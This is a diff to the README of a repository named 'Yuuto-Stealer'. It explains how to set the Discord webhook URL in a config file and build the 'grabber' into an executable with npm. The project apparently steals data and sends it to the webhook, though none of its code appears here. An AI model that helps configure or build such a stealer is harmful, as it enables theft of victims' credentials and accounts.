JustYuuto/Yuuto-Stealer/README.md

 ### Configuration

-Some things need to be configured (in the [`config.js`](config.js) file) before building the final exe, like the Webhook URL.
+Some things need to be configured (in the [`config.js`](config.js) file) before building the executable, like the webhook URL.
 If you don't know how to create a webhook, [you can learn it](https://support.discord.com/hc/en-us/articles/228383668).
 You can [click here](https://github.com/JustYuuto/Grabber/wiki/Configuration) for documentation about configuration items.

 ### Building the executable

-After configuring the grabber, we can finally build it!
+After configuring the grabber, we can finally build its executable!
 Run the following command in the project folder:

 ```bash
 npm run build